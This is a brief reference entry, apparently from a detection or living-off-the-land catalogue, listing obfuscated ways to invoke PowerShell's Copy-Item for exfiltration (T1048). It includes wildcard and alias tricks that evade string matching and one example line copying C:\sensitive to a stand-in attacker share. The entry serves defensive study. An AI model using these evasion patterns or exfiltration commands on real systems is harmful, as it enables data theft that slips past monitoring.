Copy-Item

PowerShell exfiltration T1048

Copy files and directories. Used for staging payloads, copying sensitive data for exfiltration, or lateral file movement.

Binary Paths

Pattern	Wildcards	Notes
`& (gcm C-Im) -Path C:\sensitive -Destination \\attacker\share`	*	Wildcards in both verb and noun
`& (gcm Copy-It*) -Path ...`	*	Star matches 'em'
`& (gcm C?py-Item) -Path ...`	?	Single char wildcard replaces 'o'
`& (gcm C[n-p]py-Item) -Path ...`	[n-p]	Character range matches 'o' in Copy
`copy -Path src -Destination dst`		Alias 'copy' for Copy-Item
`cp -Path src -Destination dst`		Alias 'cp' for Copy-Item
`cpi -Path src -Destination dst`		Alias 'cpi' for Copy-Item
`& (gal cp?) -Path src -Destination dst`	?	Get-Alias with wildcard resolves 'cpi' — cp? avoids matching 'cli' (Clear-Item)
`& (gcm *-Item) -Path ...`	*	Prefix wildcard — note: matches Get-Item, Set-Item etc.